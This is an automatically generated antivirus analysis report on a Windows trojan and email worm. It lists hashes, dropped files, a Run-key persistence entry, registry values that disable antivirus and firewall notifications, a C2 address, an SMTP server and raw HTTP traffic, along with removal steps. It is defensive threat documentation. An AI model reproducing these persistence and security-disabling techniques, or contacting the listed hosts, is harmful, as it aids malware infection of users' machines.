Trojan.Win32.Agent.neuywn (Kaspersky), Gen:Variant.Razy.18266 (B) (Emsisoft), Gen:Variant.Razy.18266 (AdAware), Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 32166e28f6de4ff8037bfabcd51d2d25
SHA1: f8de1c951489bbe86b456f398a71347b72c6817e
SHA256: 96ca34eb189bb9c414fb9de29c193e319e0ed6d6587ead694f594bd66139e954
SSDeep: 24576:FQzGMgkNr2nsM/Gs wb1Ycpy0XlNS pv hM:2zBa2N00XlQC m
Size: 1093120 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-21 03:12:20
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
smtp_mailer.exe:1760
ke7qslsbgtc2eo.exe:384
ke7qslsbgtbteo.exe:1180
zip.exe:1140
zip.exe:1160
zip.exe:1944
zip.exe:1472
zip.exe:260
zip.exe:828
zip.exe:412
ke7qslsbgtbweo.exe:1132
sbgtbveo.exe:1268
sbgtbveo.exe:572
sbgtbveo.exe:1088
sbgtbveo.exe:1668
sbgtbveo.exe:436
sbgtbveo.exe:1868
unzip.exe:656
unzip.exe:1472
ke7qsl3r0f2aeouizjy9l.exe:1772
ke7qslsbgtc3eo.exe:508
sbgtc5eo.exe:412
qtvtnsadc.exe:628
qtvtnsadc.exe:1748
qtvtnsadc.exe:264
win32blot2.exe:1920
%original file name%.exe:188
abhdqfjyr.exe:1364
abhdqfjyr.exe:1656
win32purst2.exe:1492
ke7qslsbgtbueo.exe:1492
ke7qslsbgtbueo.exe:460
yac32sse41b.exe:1968
The Trojan injects its code into the following process(es):
ke7qslsbgtc4eo.exe:1128
unzip.exe:1128
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process smtp_mailer.exe:1760 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (0 bytes)
The process ke7qslsbgtc2eo.exe:384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process zip.exe:1140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01140 (13096 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\71melinda.zip (0 bytes)
The process zip.exe:1160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01160 (13052 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\justin.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\82adam.zip (0 bytes)
The process zip.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01944 (12866 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\galen82.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (0 bytes)
The process zip.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01472 (13051 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\23hugh.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\bill.exe (0 bytes)
The process zip.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00260 (13040 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\wilmer89.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (0 bytes)
The process zip.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00828 (13058 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\83ariella.zip (0 bytes)
The process zip.exe:412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00412 (13076 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\trinity67.zip (0 bytes)
The process sbgtbveo.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (5506 bytes)
The process sbgtbveo.exe:572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\justin.exe (5506 bytes)
The process sbgtbveo.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (5506 bytes)
The process sbgtbveo.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\bill.exe (5506 bytes)
The process sbgtbveo.exe:436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (5506 bytes)
The process sbgtbveo.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (5506 bytes)
The process unzip.exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
The process unzip.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\p2p_04\yac\yac32avx10b.exe (601 bytes)
%System%\p2p_04\win64\win64purst2.exe (673 bytes)
%System%\p2p_04\yac\yac64sse41b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse41b.exe (601 bytes)
%System%\p2p_04\win64\win64blot2.exe (673 bytes)
%System%\p2p_04\yac\yac32fast.exe (601 bytes)
%System%\p2p_04\yac\yac64fast.exe (673 bytes)
%System%\p2p_04\yac\yac64avx10b.exe (673 bytes)
%System%\p2p_04\yac\yac64sse20b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse20b.exe (601 bytes)
%System%\p2p_04\win32\win32purst2.exe (673 bytes)
%System%\p2p_04\win32\win32blot2.exe (673 bytes)
The process unzip.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (0 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (0 bytes)
The process ke7qsl3r0f2aeouizjy9l.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
%System%\abhdqfjyr.exe (7433 bytes)
The process sbgtc5eo.exe:412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (3703 bytes)
The process qtvtnsadc.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process qtvtnsadc.exe:1748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process qtvtnsadc.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (5442 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (0 bytes)
The process abhdqfjyr.exe:1364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (342 bytes)
%System%\nkpkpudssleie\run (10 bytes)
%System%\p2p_04.zip (20060 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (35 bytes)
%System%\nkpkpudssleie\tst (10 bytes)
%System%\nkpkpudssleie\cfg (230 bytes)
%System%\nkpkpudssleie\por (1 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (342 bytes)
%System%\nkpkpudssleie\rng (92 bytes)
%System%\unzip.exe (7100 bytes)
%WinDir%\Temp\ke7qslsbgtc4eo.exe (1940 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.zip (15540 bytes)
%System%\qtvtnsadc.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (342 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (35 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (2820 bytes)
%WinDir%\Temp\sbgtbveo.exe (2820 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (7433 bytes)
%WinDir%\Temp\sbgtc5eo.exe (2820 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (340 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (35 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (340 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\sbgtbveo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\83ariella.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\trinity67.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\23hugh.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\82adam.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\71melinda.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\wilmer89.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (0 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (0 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (0 bytes)
The process abhdqfjyr.exe:1656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
Registry activity
The process smtp_mailer.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 9D A2 98 51 91 CF FB 4B 3A 17 E4 F8 A1 AC 05"
The process ke7qslsbgtc2eo.exe:384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 88 E0 A6 A9 96 96 A9 71 9E 79 3E F9 DF DB CD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbteo.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 81 6F AB 8A D1 B6 78 86 B8 45 7E D3 D7 E7 AC"
The process ke7qslsbgtc4eo.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 2B 3C BA 2C 92 CB 9F 40 59 D5 41 30 8B EE B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbweo.exe:1132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process sbgtbveo.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A C1 6D C3 61 56 C2 4D 2A F3 AC 7E 9F 13 B7 C2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 1D 29 61 A2 F7 F5 CB FD 74 96 5C A3 3A EE E6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 20 75 B6 19 08 27 35 F0 60 11 CA 1F FE B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 93 C7 77 68 84 FA D1 4D BE FC 81 CC B1 40 BF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 EF 76 67 6F 1D 6F F9 B3 69 7F 01 2B 2D CA 31"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 13 CA 1E CF 08 98 CD 00 50 B3 C8 AE BD 22 67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process unzip.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 4D 70 D2 DB A2 03 8F A8 98 08 CC 20 5D 64 A7"
The process unzip.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 5D 3A B8 6B E1 A5 84 5F 4C 00 2E 2D 08 6E 22"
The process unzip.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 7C F8 C2 AF 23 35 45 2F 9C E2 14 54 2C 98 2C"
The process ke7qsl3r0f2aeouizjy9l.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 00 26 B3 B1 C4 58 19 CD 43 4B 0C 39 7A 50 17"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Discovery Removal BranchCache" = "%System%\abhdqfjyr.exe"
The process ke7qslsbgtc3eo.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 80 EE 80 67 AF DD D1 86 2E 3E 9F FF D3 BC A3"
The process sbgtc5eo.exe:412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 05 01 E3 A4 F5 CB 19 32 A9 44 F9 ED C3 97 2E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F0 C7 8C E4 FA 70 B9 68 8F 14 D0 2B 08 2D 91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 5A D2 95 84 FD 70 C6 86 F2 F1 93 B3 1A FE 5E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 4A 06 9C A0 B5 2D 35 A9 E5 DC EF E6 2E E9 50"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process win32blot2.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 1F E2 C4 87 4F AF 60 30 5A B4 6B 2A 95 3D D5"
The process abhdqfjyr.exe:1364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 1C 17 8F 05 A9 21 D2 87 81 E9 A6 28 4F B0 33"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process abhdqfjyr.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 94 C3 95 47 8C 36 2E 21 1F 0C FA 36 89 A4 F5"
The process win32purst2.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 3F AE 00 9F B1 7C F0 15 E3 54 E8 75 3C 6C 30"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbueo.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 E1 C0 07 E0 B6 44 EE BC 08 31 48 69 D2 D2 56"
The process ke7qslsbgtbueo.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 5E 2B B8 E8 68 7D 46 05 95 83 57 33 D0 25 C8"
The process yac32sse41b.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A F0 3E 3A 09 38 97 B8 A3 81 CF 75 98 9A A6 8B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
MD5 | File path |
---|---|
476f447617f65eebf35c52d4fd3b3188 | c:\WINDOWS\Temp\ke7qslsbgtc3eo.exe |
0389ca220feefd1f68837d7de57e3ddc | c:\WINDOWS\system32\nkpkpudssleie\smtp\smtp_mailer.exe |
79aef4a7acaeb0e979537a4bc3dcc851 | c:\WINDOWS\system32\nkpkpudssleie\smtp\zip.exe |
bcbd415aead5db5389009791cebaeeaa | c:\WINDOWS\system32\p2p_04\win32\win32blot2.exe |
b4532e749d37ad30d2890607b0cc1e78 | c:\WINDOWS\system32\p2p_04\win32\win32purst2.exe |
469ac28bc4ae228f7e0eb7b712fc2964 | c:\WINDOWS\system32\p2p_04\win64\win64blot2.exe |
08e607d95b78967531e5eb6d87d1ab8e | c:\WINDOWS\system32\p2p_04\win64\win64purst2.exe |
a01b41d1547b7a687958a9a2248fd428 | c:\WINDOWS\system32\p2p_04\yac\yac32avx10b.exe |
90dee4efb3473ec8e49bcc10b2d4c12c | c:\WINDOWS\system32\p2p_04\yac\yac32fast.exe |
1b44825e7ee9f271f8750fcf2c28e200 | c:\WINDOWS\system32\p2p_04\yac\yac32sse20b.exe |
c432b8a3010f07235750b1a79beb3b8b | c:\WINDOWS\system32\p2p_04\yac\yac32sse41b.exe |
d5e071cba1b33f46cae500619e918f50 | c:\WINDOWS\system32\p2p_04\yac\yac64avx10b.exe |
0e41ebe706ffbd5ad2dd1e1ace2482a5 | c:\WINDOWS\system32\p2p_04\yac\yac64fast.exe |
4040c4ac7173b9fe5f4c64a09cd95c7c | c:\WINDOWS\system32\p2p_04\yac\yac64sse20b.exe |
2c24c2172eb721fd09498c4e0490305e | c:\WINDOWS\system32\p2p_04\yac\yac64sse41b.exe |
fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
smtp_mailer.exe:1760
ke7qslsbgtc2eo.exe:384
ke7qslsbgtbteo.exe:1180
zip.exe:1140
zip.exe:1160
zip.exe:1944
zip.exe:1472
zip.exe:260
zip.exe:828
zip.exe:412
ke7qslsbgtbweo.exe:1132
sbgtbveo.exe:1268
sbgtbveo.exe:572
sbgtbveo.exe:1088
sbgtbveo.exe:1668
sbgtbveo.exe:436
sbgtbveo.exe:1868
unzip.exe:656
unzip.exe:1472
ke7qsl3r0f2aeouizjy9l.exe:1772
ke7qslsbgtc3eo.exe:508
sbgtc5eo.exe:412
qtvtnsadc.exe:628
qtvtnsadc.exe:1748
qtvtnsadc.exe:264
win32blot2.exe:1920
%original file name%.exe:188
abhdqfjyr.exe:1364
abhdqfjyr.exe:1656
win32purst2.exe:1492
ke7qslsbgtbueo.exe:1492
ke7qslsbgtbueo.exe:460
yac32sse41b.exe:1968
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\nkpkpudssleie\tst (10 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01140 (13096 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01160 (13052 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01944 (12866 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01472 (13051 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00260 (13040 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00828 (13058 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00412 (13076 bytes)
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\justin.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\bill.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
%System%\p2p_04\yac\yac32avx10b.exe (601 bytes)
%System%\p2p_04\win64\win64purst2.exe (673 bytes)
%System%\p2p_04\yac\yac64sse41b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse41b.exe (601 bytes)
%System%\p2p_04\win64\win64blot2.exe (673 bytes)
%System%\p2p_04\yac\yac32fast.exe (601 bytes)
%System%\p2p_04\yac\yac64fast.exe (673 bytes)
%System%\p2p_04\yac\yac64avx10b.exe (673 bytes)
%System%\p2p_04\yac\yac64sse20b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse20b.exe (601 bytes)
%System%\p2p_04\win32\win32purst2.exe (673 bytes)
%System%\p2p_04\win32\win32blot2.exe (673 bytes)
%System%\abhdqfjyr.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (3703 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (5442 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (342 bytes)
%System%\nkpkpudssleie\run (10 bytes)
%System%\p2p_04.zip (20060 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (35 bytes)
%System%\nkpkpudssleie\cfg (230 bytes)
%System%\nkpkpudssleie\por (1 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (342 bytes)
%System%\nkpkpudssleie\rng (92 bytes)
%System%\unzip.exe (7100 bytes)
%WinDir%\Temp\ke7qslsbgtc4eo.exe (1940 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.zip (15540 bytes)
%System%\qtvtnsadc.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (342 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (35 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (2820 bytes)
%WinDir%\Temp\sbgtbveo.exe (2820 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (7433 bytes)
%WinDir%\Temp\sbgtc5eo.exe (2820 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (340 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (35 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (340 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Discovery Removal BranchCache" = "%System%\abhdqfjyr.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 966838 | 967168 | 4.85414 | 1a001072b2a30164896c0722ae7fc7c3 |
.rdata | 974848 | 24220 | 24576 | 2.60903 | 9e6f1d153121d51b8ce97e7c738a5fb1 |
.data | 999424 | 195856 | 5120 | 2.21568 | b273418e7f6192fc2d5b5d807ef30abf |
.reloc | 1196032 | 95140 | 95232 | 4.73261 | 13e2f6958b7681ac3caec052fce286f2 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://185.106.120.168/index.php | |
smtp.carpenteriadiciccio.it | 62.149.128.203 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
